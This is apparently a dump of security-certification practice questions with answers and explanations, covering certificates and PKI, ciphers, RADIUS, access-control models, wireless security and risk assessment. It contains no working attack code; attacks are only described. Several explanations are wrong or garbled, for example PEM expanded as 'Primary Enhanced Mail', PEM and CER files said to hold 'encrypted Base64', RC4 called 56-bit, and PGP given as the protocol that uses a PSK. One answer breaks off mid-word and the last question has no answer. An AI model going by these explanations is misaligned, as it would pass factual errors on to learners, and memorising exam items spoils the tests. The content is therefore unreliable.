OCSP Online Certificate Status Protocol (OCSP) is a real-time protocol for validating keys. OCSP is replacing CRL, which takes 24-48 hours to broadcast. Answer C is incorrect. Object identifiers (OID) are optional extensions for X.509 certificates. They are dotted decimal numbers that would assist with identifying objects. Answer B is incorrect. A certificate signing request (CSR) is typically one of the first steps in getting a certificate for authentication from a certificate authority (CA).Answer A is incorrect. A certificate revocation list (CRL) is a method for listing certificates that have expired, been replaced, or were revoked. A web browser, for example, would check a CRL to verify whether or not the responding server is authentic. A CRL takes 24-48 hours to broadcast, which could cause an invalid key to be accepted.

You need to examine some additional information about a key. Specifically, you want to validate the address information of the certificate owner. What could you examine to accomplish this?

OID Object identifiers (OID) are optional extensions for X.509 certificates. They are dotted decimal numbers that would assist with identifying objects. As an example, 2.5.4.9 would identify a street address. Public and private keys are both components of a public key infrastructure (PKI). Public keys are one half of an asymmetric cipher. The sender employs a public key to encrypt a message, and the receiver uses a private key to decrypt the message.Online Certificate Status Protocol (OCSP) is a real-time protocol for validating keys. OCSP is replacing CRL, which takes 24-48 hours to broadcast. It does not usually contain information about the certificate owner.

You want to ensure that certificates that have expired, been replaced, or were revoked are no longer used. You discover that updates to the list of invalid certificates may take 24-48 hours to circulate, leaving a window of vulnerability in which invalid keys may be accepted. Which of these solutions is the BEST to use if you want to avoid accepting invalid keys?

OSCP OCSP is the BEST to use. Online Certificate Status Protocol (OCSP) is a real-time protocol for validating keys. OCSP is replacing CRL, which takes 24-48 hours to broadcast. Answer C is incorrect. A certificate revocation list (CRL) is a method for listing keys that have expired, been replaced, or were revoked. A web browser, for example, would check a CRL to verify whether or not the responding server is authentic. A CRL takes 24-48 hours to broadcast, which could cause an invalid key to be accepted. Answer B is incorrect. A certificate signing request (CSR) is typically one of the first steps in verifying the authentication of a certification from a certificate authority (CA). This process allows the CA to verify the identity of the requestor to ensure that keys are only issued to valid recipients.Answer A is incorrect. Object identifiers (OID) are optional extensions for X.509 certificates. They are dotted decimal numbers that would assist with identifying objects. They have no effect on the time it takes to circulate invalid or revoked certification lists.

Your company must implement a subnetwork that is highly secure. Management asks you to implement an encryption method that is used only once for a single document. Which encryption method should you use?

OTP A one-time pad (OTP) is an encryption method designed to be used only once. An OTP is a random number that is used to encrypt only one document. The OTP must be used to decrypt a file that was encrypted with the OTP. Data Encryption Standard (DES) is a private key encryption algorithm. A substitution cipher is an encryption method that substitutes one character with another character in a particular pattern. For example, the Caesar cipher is a substitution cipher that replaces a letter with a letter that appears three letters later in the alphabet. For example, in the Caesar cipher, the letter J is replaced with the letter M.

Your Internet café operates a public wireless hotspot. Which of the following should you implement?

Open system authentication The best answer listed is to use open system authentication. In a public hotspot wireless network, this means that anyone can connect as long as they know the password or passphrase. You could also utilize a captive portal, which forces the wireless client to authenticate via a special web page and possibly supply an e-mail address as part of the authentication process. Disabling the SSID would make it difficult for a computer to find the wireless network, and therefore difficult (if not impossible) for patrons to use the Internet. A MAC filter would be very inefficient as the proprietor of the establishment would need to find out the MAC address of each person coming through the door. Reducing the WAP power level is a good way to reduce the chances of war-driving, but isn't necessary in this scenario, though it is a good practice.

Your client is migrating from a Windows-based server to an Apache server. You need to convert the current X.509 certificate so that it can be used on the new Apache server. What is the original file extension for the X.509 certificate?

PFX The original file extension for the X.509 certificate is PFX. A PFX certificate file is used by Microsoft, and contains both the public and private keys. The container is fully encrypted. You should use OpenSSL to convert this into a PEM encoded file. The two most common file types for exporting the private key are PFX and P12.Primary Enhanced Mail (PEM) certificates are primarily used for web servers, and can be read in a text editor. The PEM encoded file contains the certificate encoded in encrypted Base64. This type of file extension is used in Unix/Linux environments. In this scenario, you need to convert the X.509 certificate's file extension (PFX) to PEM.A Canonical Encoding Rules (CER) certificate contains the certificate encoded in encrypted Base64. It does not support storage of the private key or certification path. This file extension can be read by Windows servers.Like CER encoded files, Distinguished Encoding Rules (DER) encoded files do not support storage of the private key or certification path. These can be converted to PEM encoded files through SSL. By default, Windows exports certificate files as DER encoded files. This is the "parent" format of PEM.P12 is a variant of PFX.

Which of the following encryption protocols uses a PSK?

PGP

In an environment where the transmission and storage of PII data needs to be encrypted, what methods should you select? (Select the two best answers.)

PGP SSH SSH (Secure Shell) can secure connections to remote machines and is instrumental in encrypting data in motion over the network. PGP (Pretty Good Privacy) encrypts data that is meant for transit via e-mail or for data that is meant to be at rest, or simply stored somewhere for an indeterminate amount of time. These are the only answers listed that will encrypt data and/or data sessions (and are not outdated).TFTP is used to send small and basic files in an unsecure manner between two hosts on a LAN. It does not encrypt data. The Temporal Key Integrity Protocol (TKIP) is used as a security protocol in wireless networks but is outdated and should be replaced by either Counter Mode CBC-MAC Protocol (CCMP) or Advanced Encryption Standard (AES). TKIP is insecure because it makes use of RC4, which is considered outdated. The Simple Network Management Protocol (SNMP) concerns the monitoring of networks and network devices and hosts. NTLM (NT LAN Manager hash) is a cryptographic hashing protocol used with Windows passwords. This is also outdated and should be replaced with NTLMv2.

You are working on a new security system for a federal courthouse. You must ensure that both employees and contractors are able to enter the building using certificate-based authentication. Which authentication system should you integrate?

PIV A Personal Identity Verification (PIV) card is a certificate-based smart card issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login.A Common Access Card (CAC) is a certificate-based smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login.HOTP and TOTP are two types of one-time passwords, (i.e., they can only be used once). Hashed One Time Passwords (HOTP) are secure passwords used with hardware tokens. Time-based One Time Passwords (TOTP) are issued for a specific period of time. Once used, or once the time expires, the TOTP is no longer valid.Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Smartcards have permissions and access information stored on the card. The greatest concern with smart cards is theft. Once stolen, the thief can use the card in the same manner as the rightful owner. As an example, if the user has access to a highly secure area by using the smartcard, a thief would have the same access when using the stolen card. Software tokens are a component of two-factor authentication systems. They are usually embedded on a device and used to authenticate the user. Proximity cards are a type of smartcard that incorporate Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is with range of the proximity card, and the information transmitted is correct, authentication is granted. Attribute-based access control (ABAC) goes beyond authentication based on user name and password. It evaluates other factors, such as time of day and location of logons. Another aspect would be if a user has read access to files, but is attempting to edit or delete files remotely. File system security should always be set to only allow what is absolutely essential for the user to do their job. This is also known as the principle of least privilege.

While running a new network line, you find an active network switch above the ceiling tiles of the CEO's office with cables going in various directions. What attack is occurring?

Packet sniffing The network switch is probably intercepting cables to and from the CEO's office, and is probably replaying information to an attacker somewhere (perhaps a malicious insider), where packets are being analyzed by a packet sniffer such as Wireshark. Impersonation is when a person attempts to gain access to a building by posing as someone else; it is a form of social engineering. Spear phishing, another type of social engineering, is when one or more individuals are targeted specifically. It is a derivative of phishing. The highly specific version of that—whaling—could possibly be happening here; you don't know without further analysis. MAC flooding is when a switch's content addressable memory (CAM) table is flooded with numerous packets, causing the switch to switch to fail-open mode and broadcast information instead of functioning as a proper switch.

Which of the following are the best options when it comes to increasing the security of passwords? (Select the two best answers.)

Password complexity Password length The two best ways to increase security of passwords are to have longer passwords (for example, 10 to 15 characters in length) and to make the passwords more complex (for example, adding uppercase letters, numerals, and special characters). It is these two methods that will make a password difficult to crack. Finally, the best way to enforce the creation of complex passwords is to configure a policy within the computer system. It is also important to have a maximum password age before expiration, and disallow the use of passwords that were previously used in history. However, these are minor methods compared to password complexity and password length.

The IT director asks you to configure security for your network. The network is isolated from the Internet by a perimeter network. The perimeter network contains three web servers and a network intrusion detection system. You need to test the network's capability to detect and respond to a denial-of-service attack against the applications running on the web servers. What method should you use?

Penetration testing Penetration testing will give you a detailed account of whether a network has the capability to detect and respond to a denial-of-service attack. Penetration testing is a type of active testing that should be performed during off-hours because it uses many resources on the network and on the computer running the test. The other three answers are types of passive analysis. They might tell you whether the network has the capability to detect an attack, but they cannot tell you whether the network has the capability to respond to an attack. The network intrusion detection system (NIDS) only detects attacks and warns an administrator if it finds one. So in actuality, chances are your penetration tests will inform you that the network cannot respond to a DoS attack.

What is it known as when traffic to a website is redirected to another, illegitimate site?

Pharming Pharming (a portmanteau of farming and phishing) is an attack that redirects traffic from a legitimate site to a different illegitimate and possibly malicious site. It can occur because of an exploited DNS server (which would affect many users), or can occur by modifying the hosts file of one or more computers (which would affect those computers only). If a hosts file is modified, it can be easily fixed by deleting the file, and either re-creating the file or letting the operating system re-create it. Individual computers can also be protected by configuring anti-phishing in the web browser or adding on third-party anti-phishing software, and using updated antivirus software. DNS servers can be protected through careful monitoring of DNS configurations and log files. Phishing is an attempt at obtaining private information from someone. It is usually done by e-mail. Whereas pharming attacks are often designed to "phish" for information, phishing can be accomplished in a variety of ways in addition to pharming. Whaling is a subset of phishing and refers to when an attacker targets senior executives, which is an example of spear phishing. Spim is the abuse of messaging systems other than e-mail.

You are the security administrator working for a large corporation with many remote workers. You are tasked with deploying a remote access solution for both staff and contractors. Company management favors Remote Desktop Services because of its ease of use. Your current risk assessment suggests that you protect Windows as much as possible from direct ingress traffic exposure. Which of the following solutions should you choose?

Place the remote desktop server(s) on a screened subnet, and implement two-factor authentication. The key phrase here is that the risk assessment suggests that Windows should be protected from ingress traffic. That mainly implies the Windows clients, but could include the Windows server as well. Either way, to that end, one of the best ways to secure the server is to compartmentalize the remote desktop server on a screened subnet. Remember that contractors will be using this server too, so you don't want it to be anywhere near other important servers in your network, and possibly it should be isolated from any and all servers. The two-factor authentication is the icing on the cake, and is an excellent solution for remote workers where theft/loss of laptops can occur. All in all, it's the best of the listed answers. Answer A is incorrect. Changing the remote desktop port is commonly implemented. For example, Microsoft remote desktop services uses 3389 inbound by default. Any attacker with a little experience knows this. So, changing the port is a good idea, but from the answer you can assume that the server is not in a screened subnet, DMZ, or similar protected area. Implementing password complexity for the Active Directory domain implies that the remote desktop server is located in the domain. You probably don't want that, or at least need to compartmentalize it in some way. Also, password complexity should already have been enabled, especially if this is an enterprise-level corporate network. Answer D is incorrect. It's kind of a given: you would have to distribute some kind of VPN client software in order for remote users to connect. However, IPsec implies an L2TP connection. There are better, more secure options such as a Cisco GRE tunnel, or an always-on SSL/TLS-based VPN. But that doesn't tackle the problem of server location. Also, "virtualize the remote desktop services functionality" is vague. Are we talking about the clients? Server? Both? Most likely clients, and virtualizing apps can have security benefits, but remote desktop client apps aren't commonly virtualized. And if this is a large enterprise network (implying lots of remote users), then a virtualized remote access server is probably not a good idea from a performance standpoint. Answer B is incorrect. We definitely don't want the remote access server on the LAN. No, it should be located somewhere more secure such as a DMZ, subnet, on the cloud, etc. Active Directory with SSL (meaning LDAP over SSL, port 636) is a good idea, but it again implies that the remote desktop server is on the LAN. Using a subnet or DMZ and using multifactor authentication dismisses most of the security issues associated with this incorrect answer's solution.Remember to carefully secure your remote desktop servers using a layered defense strategy, especially if that server requires communication with a domain controller or other server on the LAN.

Mitigating risk based on cost could be described as which of the following?

Quantitative risk assessment Quantitative risk assessment measures risk using exact monetary values. Qualitative risk assessment assigns numeric values to the probability of risk. Business impact analysis is the differentiation of critical and non-urgent functions and is part of a DRP or a BCP. A vulnerability assessment is an analysis of security weakness in an organization.

Which of the following only encrypts the password portion of a packet between the client and server?

RADIUS RADIUS only encrypts the password portion of an access-request packet that is transmitted between the client and the server. TACACS, TACACS+, and XTACACS encrypt the entire body of the packet.

You need to allow remote access users to log on to a network through a shared authentication database. Which of the following should you deploy?

RADIUS Remote Access Dial-In User Service (RADIUS) enables remote access users to log on to a network through a shared authentication database. When a remote user logs on to a network that uses RADIUS, a RADIUS client sends a remote user's credentials to a RADIUS server. A RADIUS server checks a remote user's credentials and sends a reply back to the RADIUS client. If the remote user's credentials are valid, then the RADIUS client will allow the remote user to log on to the network. If the remote user's credentials are invalid, then the RADIUS client will not allow the remote user to log on to the network. A war dialer program is typically used by attackers to access a company's internal network through its remote access system. Answer D is incorrect. Data Encryption Standard (DES) is a private key encryption standard that can be used to encrypt files. Answer A is incorrect. Internet Protocol Security (IPSec) can be used to digitally sign and encrypt Internet Protocol (IP) packets. Answer B is incorrect. Secure Shell (SSH) is a method for securing sessions between network computers. SSH is most often used in UNIX environments, but is also available for Windows and OS/2 computers.

You are designing a wireless network for commercial tenants in a shopping area. As a group, the tenants want to build a community network where their customers have internet access throughout the area, regardless of which retailer's network the customer is using. What technology would allow you to do that?

RADIUS federation RADIUS Federation is a group of RADIUS servers that assist with network roaming. The servers will validate the login credentials of a user belonging to another RADIUS server's network.None of the other options will allow customers to have internet access throughout the area. They are simply authentication protocols that could be implemented. In Extensible Authentication Protocol-Transport Layer Security (EAP-TLS) EAP manages key transmissions, and TLS uses X.509 digital certificates for authentication. In Extensible Authentication Protocol-Tunneled Transport Layer Security (EAP-TTLS) EAP manages key transmissions, and TTLS is an extension of TLS (which authenticates the server). TTLS encapsulates the TLS session, allowing for authentication of the client.Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling (EAP-FAST) is used in wireless and point-to-point networks. EAP manages key transmissions, and FAST creates a TLS tunnel to be used in authentication through a protected access credential.Captive portals are associated with public-access WiFi networks. Once you select the network, you are directed to a web page where you must sign on and agree to a policy, such as an acceptable use or fair use policy. Once your agreement is accepted, you can proceed to use the network. These portals are typically found in a public place, such as a hotel, coffee shop, or airport. WiFi Protected Setup (WPS) allows a wireless access point to broadcast a PIN, which connecting devices use for authentication. It is not a difficult task to break the PIN using a packet sniffer. IEEE 802.1x is standard for network access control. It allows you to apply security to an individual port on a switch with the result of only allowing authenticated users access to that port.

You are currently comparing stream ciphers and block ciphers. You have decided to use only block ciphers and hash algorithms on your organization's network. Which cryptographic algorithm is a stream cipher?

RC4 RC4 is a stream cipher. Wired Equivalent Privacy (WEP) is considered unsecure because of its improper use of RC4. RC4 would be a great algorithm to use for encrypting streaming video because it is a stream-based cipher. RC4 provides 56-bit encryption.Stream and block ciphers are the two main types of symmetric algorithms. Block ciphers process one block of bits, and stream ciphers process one bit at a time. RC5 and RC6 are block ciphers. RC4, RC5, and RC6 do not provide one-way hashing.MD5 is a one-way hashing algorithm. One-way hashing refers to inserting a string of variable length into a hashing algorithm and producing a hash value of fixed length. This hash value is appended to the end of the message being sent. This hash value is recomputed at the receivers end in the same fashion in which it was created by using the same computational logic. If the recomputed hash value is the same as the generated hash value, the message was not altered during the course of transmission.Hashing algorithms include MD2, MD4, MD5, HAVAL, and all of the Secure Hash Algorithm (SHA) variants. Hashing is the best way to protect integrity of sensitive data entered in a database table.Symmetric ciphers have modes of operation: ECB, CBC, CTM or CTR, and GCM. Electronic Code Book (ECB) mode implements the cipher in its original form. Cipher-block Chaining (CBC) mode uses the output of each block and XORs it with the following block to increase diffusion. Counter Mode (CTM or CTR) converts a block cipher into a stream cipher. Galois Counter Mode (GTM) uses a hash function to further complicate the encryption.

Your server room has most items bolted down to the floor, but some items—such as network testing tools—can be easily removed from the room. Which security control can you implement to allow for automated notification of the removal of an item from the server room?

RFID RFID (radio-frequency identification) tags could be attached to mobile items such as network testers, laptops, and so on. These tags can be extremely small and hard for an intruder to notice. Any proximity point that the item is not supposed to go past can be configured to automatically set off an alert or alarm when the RFID tag passes it. None of the other answers allow for automatic notification of item removal. Environmental monitoring is the real-time analysis of controls and programs that concern heating, ventilation, and air conditioning (HVAC) and supervisory control and data acquisition (SCADA). Electromagnetic interference (EMI) shielding is used to reduce or eliminate crosstalk and data emanation. CCTV (closed-circuit television) is used to monitor and record things that transpire within the work area, but again cannot (without the help of other software/technology) alert an administrator automatically.

You have been hired as a security consultant. The company owner asks you to implement public key encryption to protect messages traveling between two points. Which algorithm should you implement?

RSA Rivest, Shamir, Adleman (RSA) is a public key encryption algorithm. RSA supports encryption and decryption and secures data with an algorithm that is based on the difficulty of factoring large numbers. A public key encryption algorithm is sometimes referred to as an asymmetric encryption algorithm. With asymmetric encryption, the public key is shared and used to encrypt information, and the private key is secret and used to decrypt data that was encrypted with the matching public key. Using RSA, messages traveling between two points are encrypted and authenticated. RSA tokens are used to provide a rolling password for one-time use.Private key encryption is sometimes referred to as symmetric encryption. With symmetric key encryption, the private key is used to both encrypt and decrypt data. International Data Encryption Algorithm (IDEA), RC5, and Skipjack are private key encryption algorithms.

Which of these options is particularly dangerous because it processes data with little or no latency?

RTOs Real Time Operating Systems (RTOs) are particularly dangerous because they process data with little or no latency. They are susceptible to code injection, exploiting shared memory, priority inversion, DoS attacks, and attacks on inter-process communication.Answers D, C, and B are incorrect. While the other options are security risks, none processes data with little or no latency. Home automation devices, such as smart thermostats, lighting systems, and refrigerators, are susceptible to security issues. The security concerns are the same as for industrial controls, just at the home level. Wearable technology devices are at risk. Most transmit via WiFi or Bluetooth to a host device, and as such are subject to attack. In addition to being subject to attack, wearable devices such as voice recorders, video recorders, and hidden cameras can also be used for an attacker to gain information. System on a chip (SOC) is often found in smart phones. Checks should be incorporated that ensure the system only boots with trusted code and builds a root of trust (RoT).

Which memory vulnerability is associated with multithreaded applications?

Race condition Race conditions occur when you have a variable that is accessed by several threads of an application. Improper handling of that variable can lead to unexpected values associated with the variable in question.Answer B is incorrect. DLL injection is an attack where a piece of malware inserts a piece of code into a DLL. The behavior of the DLL changes, and produces unexpected results in the application calling the DLL.Answer A is incorrect. Pointer dereferencing changes the target memory location of a pointer. As a result, the calling application receives an incorrect, unexpected, or critical value. For example, in a computerized blood bank, a dereferenced pointer can cause a blood type to be categorized incorrectly. Answer D is incorrect. Resource exhaustion occurs when a system runs out of limited resources, such as bandwidth, RAM, or hard drive space. Without the required storage space (as an example), the system can no longer perform as expected, and crashes.Weak cipher suites and implementations can cause system vulnerabilities. As an example, a SOHO router using inherently weak WEP encryption can lead to an easy network attack.

Your client's HR practices include promotion from within, and transferring people between offices on a regular basis. It seems like the most common question you hear when employees talk on the phone is "What office are you working at now and what are you doing?" What practice will ensure that a user's permissions are relevant and current?

Recertification Recertification is the process of examining a user's permissions and determining if they still need access to what was previously granted. For example, if someone were transferred from the Chicago, IL office to the Charlotte, NC, it would be reasonable to revoke the user's Chicago permissions. Likewise, a promotion would most likely require new privileges, and it is important to examine whether the privileges from the old position are still necessary. Answer A is incorrect. Federation and federated identity is the ability of a user to use a single identity across multiple businesses or networks. It differs from single sign-on, where a user has one password that grants access to all the permitted network resources. Federation would address enabling user's logon from office to office, but would not address the issue of current and relevant permissions related to users' job roles.Answer D is incorrect. Creating a standard naming convention would resolve an issue relating to account names that identify job roles or locations. However, it would not address the issue of current and relevant permissions.Answer C is incorrect. Transitive trust involves creating relationships between domains to grant authenticated users access to other domains. In Active Directory, for example, if the Sales domain trusts the Marketing domain, and the Marketing domain trusts the HR domain, then Sales trusts the HR domain, through a transitive relationship.

The company you work for has a large number of employees who are considered a mobile workforce. These employees need to access resources on the LAN from their home or while traveling. Which of the following tunneling/VPN solutions would be more appropriate in this situation?

Remote access A remote access VPN allows geographically dispersed users to access the intranet or other company resources. It is ideal for a mobile workforce. Answer C is incorrect. A site-to-site VPN allows an organization to connect two or more remote offices and have it appear that they are all local to each other. It can also be used for partner connections.Answer B is incorrect. IPSec is the encryption protocol used in secure VPN connections. While IPSec may be used, it has nothing to do with the type of VPN deployed.Answer A is incorrect. Point to Point Tunneling Protocol (PPTP) uses an initial public Internet connection, and creates a second connection (tunnel) through which VPN traffic is managed. A VPN can use PPTP, but this protocol does not affect the type of VPN deployed.

Your network is an Active Directory domain controlled by a Windows Server domain controller. The Finance group has read permission to the Reports and History shared folders and other shared folders. The Accounting group has read and write permissions to the Reports, AccountRecs, and Statements shared folders. Several users are members of both the Finance and Accounting groups. All the folders are located on a file server. The Everyone group is granted the Full Control NTFS permission for each folder through inheritance, but non-administrative users do not have the right to log on locally at the server. Access to the shared folders is managed through share permissions. It is determined that the Finance group should no longer have read access to the Reports folder. This change should not affect access permissions granted through membership in other groups. What is the best solution to the problem?

Remove the read permission from the Finance group for the Reports folder

Your organization is a subcontractor for a major government defense contractor. While writing an incident response plan, you must determine the circumstances under which to bring in an outside contractor. Which portion of the incident response plan includes this information?

Reporting and escalation guidelines An incident response plan should include reporting requirements and escalation guidelines. The reporting requirements would indicate how incidents are reported, what documentation is required, and what outside agencies (if any) should be notified. Escalation guidelines would indicate under what circumstances you need to ask for additional assistance. When following the incident response plan, the final outcome of an incident should be a documented incident. Among the things to include would be what happened, who responded, what the damage was, what type of incident occurred, and what escalation was taken.Cyber-incident response teams should be designated well in advance. They should be selected based on their particular area of expertise. The teams should practice responses to various security incidents and usually consist of internal employees. Contractors are usually not part of the cyber-incident response teams because they are only used when needed. The incident response plan should include the roles and responsibilities of the members of the incident response team. Each role and responsibility should be clearly defined. For examples, first responders should be responsible for securing the scene to preserve evidence. Incident handlers should gather evidence, secure or seize equipment, and document the scene. A designated spokesperson should be the point of contact for the media, and deliver the appropriate message on behalf of the company. Because contractors are not part of the team, they do not have an assigned role and responsibility as a permanent part of the incident response plan. If a contractor is needed, they are contacted at that time, and a separate contract, not the incident response plan, spells out their roles and responsibilities.An exercise requirement should be included in an incident response plan. By using a mock incident as an exercise or drill, this would allow for training and evaluation of the effectiveness of a response or containment activity.An incident response plan should outline the incident types and category definitions. These definitions help dictate how the incident is handled, what actions the incident response team should take, and data collection and evidence gathering. For example, an incident response plan should define incident types that would be handled internally and incident types that should be turned over to law enforcement. You would also categorize the incident types by severity of impact, with each category having clearly defined response times, which resources would be assigned to the incident, and what should be done to prepare for the possibility of that incident.

Your Windows domain has additional servers configured as member servers. Your job is to minimize the risk of unauthorized persons logging on locally to the member servers. Your solution should have a minimal impact on local management and administration and should not limit administrator access. Which of the following are the best solutions?

Require strong passwords. Rename the local default accounts. By renaming the local default accounts (which includes the administrator account), users will have a difficult time attempting to select a username with administrative access. Most people know that the default administrative account in Windows is the administrator account; by renaming it you add a layer of security. Requiring strong passwords is always a good idea and can help prevent an unauthorized user from logging on to the member server. On some Windows systems, by default, the administrator account has a blank password. It is common procedure to rename the account and configure a complex password.Disabling account lockout policies makes the server less secure. By default, services do run under the local system account. Disabling the local default accounts would also disable the administrator account, and the question specifies that administrator access should not be limited. It is not a good idea to provide backdoors into any servers or devices; if backdoors are found, they should be eliminated or reported to the vendor of the software.

You are the systems administrator for your organization. Human resources notifies you that a particular user has been terminated. What should you do?

Retain the user's data for a specific amount of time. Disable the user's accoun If a user is terminated, standard policy is to disable that user's account and to retain the user's data for a specific amount of time, which should be stated within the policy. It is not wise to delete a user's account because all audited information and encryption keys associated with the user account will be lost.

Susan is in charge of installing a business-critical application on an Internet-facing server. She is going to update the application to the most current version. What other security control should she perform in conjunction with the update?

Review and apply vendor-provided hardening documentation Third-party applications will usually come with a slew of documentation, including a list of hardening methods. This vendor documentation should be applied while updating the application as part of the entire application security process. It is the best answer as far as what to do in conjunction with the update. Running a port scan is a good idea at some point, but it has less to do with the application and more to do with finding unnecessary ports and services. If the application is installed on an Internet-facing server, there probably won't be a firewall involved. If the application server is in a DMZ, it will probably be behind a firewall, but, by definition, even if the DMZ-based application serves users on the Internet, this isn't considered to be directly Internet-facing. Otherwise, the firewall should usually be set up to allow an application to auto-update, but you never know—some applications might need to be updated manually, depending on the security level of the application and organizational policy.

Your organization (ABC-Services Corp.) has three separate wireless networks used for varying purposes. You conducted a site survey and found the following information from your scans: SSID - State - Channel - Level ABC-WAP1 - Connected - 1 - 80 dbm ABC-WAP2 - Connected - 6 - 90 dbm ABC-WAP3 - Connected - 11 - 75 dbm ABC-WAP4 - Connected - 4 - 65 dbm

Rogue access point It appears from the information given that there is a rogue access point (ABC-WAP4). This could be a WAP that was forgotten about, or one that was purposely and maliciously placed inside the network. Note that the question stated there are three wireless networks, and that the first three WAPs utilize nonoverlapping channels (1, 6, and 11). However, the fourth WAP uses channel 4 (which would overlap with the ABC-WAP1), and has a lower power level reading, meaning that it is probably somewhere near the physical perimeter of your building. To mitigate the issue, this WAP should be physically located and taken offline.Wireless jamming would cause one or more of the WAPs to fail, and would ultimately cause connectivity issues for wireless users; this is not mentioned in the scenario. Packet sniffing is the capturing of data that crosses the network. This could possibly be happening if an attacker is monitoring the fourth WAP, but you do not know this. Near field communication (NFC) is a standard used by smartphones to establish radio communications easily over short distances (often by touching the two devices together or bringing them very close to each other).

You have been commissioned by a customer to implement a network access control model that limits remote users' network usage to normal business hours only. You create one policy that applies to all the remote users. What access control model are you implementing?

Role-based access control Role-based access control (RBAC) works with sets of permissions; each set of permissions constitutes a role. Users are assigned to roles to gain access to resources. Examples of user groups that are assigned to roles include remote users, extranet users, guests, and so on. In this question, the remote users are the group that has been assigned a role that enables them to access the network only during normal business hours. Role-based access control should not be confused with rule-based access control, which is a type of mandatory access control (MAC). MAC is an access control policy determined by a computer system and not by a user or owner. Discretionary access control (DAC) is generally determined by the owner of a resource.

Which of these is part of a scan to identify a common misconfiguration?

Router with a default password Looking for a router with a default password would be part of a scan to identify common misconfigurations. When you attempt to identify common misconfigurations, you are looking for areas where out-of-the-box solutions were not configured to be secure before being placed in the network. Answer B is incorrect. A password policy is not a common misconfiguration. When you passively test security controls, you are performing a vulnerability scan to identify weakness, but not exploiting those weaknesses. Testing security controls usually includes testing the password policy.Answer A is incorrect. You would not perform a dictionary attack or packet sniffing to identify common misconfigurations. When you are scanning to identify a vulnerability (or several vulnerabilities), you are primarily looking for common misconfigurations and/or a lack of security controls. Once a vulnerability is discovered, a dictionary attack or packet sniffing attack may be possible.Answer D is incorrect. When you scan to identify lack of security controls, you are looking for things like appropriate access controls, authentication controls, input validation, and proper logging, among others. A false positive can occur when a vulnerability is identified that, in reality, is not a vulnerability.

Which of the following is a trusted OS implementation used to prevent malicious code from executing on Linux platforms?

SELinux Security-Enhanced Linux (SELinux) is a feature that supports mandatory access control and includes modifications that add security to Linux distributions to help prevent malicious and suspicious code from executing. System File Checker (SFC) is a utility in Windows that checks the integrity of system files and replaces them if necessary. Tripwire is Linux-based open source software designed to check data integrity and alert users to changes. Vmlinuz is a compressed bootable version of the Linux kernel.

Alice has read and write access to a database. Bob, her subordinate, only has read access. Alice needs to leave to go to a conference. Which access control type should you implement to trigger write access for Bob when Alice is not onsite?

Rule-based access control You would want to write a rule that automatically gives Bob write access to the database when Alice is gone. This is an example of rule-based access control. In this type of access control model, the security administrator writes the rule and allows the computer to automate the action of the rule when necessary.Discretionary access control (DAC) is when the user has ownership of the resource in question and can create permissions as necessary. Mandatory access control (MAC) is similar to rule-based access control; in fact, rule-based access control is a subset of MAC. However, MAC is controlled by the system and does not work at this type of depth concerning rules. Role-based access control (RBAC) concerns users and their roles in the organization, including which groups they are members of, and applies rights and permissions accordingly. Attribute-based access control (ABAC) is a context-aware model that utilizes dynamic authentication and bases its decisions on the results of IF-THEN statements.

You have been asked to implement the e-mail security method that is defined in RFC 2632 and RFC 2634. Which e-mail security method should you implement?

S/MIME Secure Multipurpose Internet Mail Extension (S/MIME) version 3 is an e-mail security method that is defined in Request for Comments (RFC) 2632 and RFC 2634. S/MIME 3 provides non-repudiation, authentication, and integrity for e-mail messages. Privacy Enhanced Mail (PEM) and MIME Object Security Services (MOSS) are older proposals for e-mail security standards that have not been adopted. Pretty Good Privacy (PGP) is the current de facto e-mail security standard. The Internet Engineering Task Force (IETF) is currently developing a version of PGP known as Open-PGP.

You need to include some additional information in the certificate definition. Specifically, you would like to include the host name associated with the certificate. Which of the following would provide a solution?

SAN A Subject Alternative Name (SAN) is a field in the certificate definition that allows you to stipulate additional information, such as an IP address or host name, associated with the certificate. Answer A is incorrect. Machine/computer certificates are assigned to a designated machine. During authentication, the computer (or machine) requesting access must supply the certificate assigned to it. These certificates do not always include host name information.Answer B is incorrect. Domain validation certificates are very common. They are low-cost, and are often used by web admins to offer TLS to a domain. They are validated using only the domain name. However, they do not allow you to configure alternate information in the certificate. These certificates do not always include host name information.Answer C is incorrect. Extended validation certificates, as the name suggests, provide additional validation for HTTPS web sites. The certificate provides the name of the legal entity responsible for the web site. These certificates require the most effort by the CA to validate and provide a higher level of trust than domain validation because they are validated using more than the domain information, including the host name.You should also be familiar with email certificates, code signing certificates, user certificates, and root certificates.User certificates are assigned to individual users, much like machine/computer certificates are assigned to individual machines. Users must provide their assigned certificate for authentication prior to accessing certain resources. Email certificates are used to secure email. One such example is Secure Multipurpose Internet Mail Extensions (S/MIME), which provides a digital "signature" for that email. Code signing certificates are used for code that is distributed over the Internet, including programs or applications. Code signing certificates verify the code's origin and help the user trust that the claimed sender is indeed the originator.Root certificates define the root CA and validate all other certificates issued by that CA. They are at the top of the CA hierarchy. They are self-signed and are closely guarded.

Which of the following protocols operates at the highest layer of the OSI model?

SCP SCP (Secure Copy) is a protocol/application used to transfer files securely between computers. It relies on Secure Shell (SSH) and uses port 22, and it is an application, and therefore resides on the application layer (layer 7), the highest layer of the OSI model, as does SSH. Because the OSI model is normally represented with a top-down approach, the application layer is at the top, and is considered "highest."IPsec is a protocol used to secure IP communications, for example within Layer 2 Tunneling Protocol (L2TP) VPN connections; it is a network layer (layer 3) protocol. TCP resides on the transport layer (layer 4). ICMP (Internet Control Message Protocol) resides on the network layer (layer 3), and is instrumental in testing networking connections; for example, with the ping command.

You analyze the network and see that a lot of data is being transferred on port 22. Which of the following set of protocols is most likely being used?

SCP and SFTP SCP (Secure Copy) and SFTP (Secure FTP) both rely on SSH, which uses port 22. SSL uses port 443. Telnet uses port 23. FTP uses port 21, and TFTP uses port 69.

When calculating risks by using the quantitative method, what is the result of multiplying the asset values by the exposure factor (EF)?

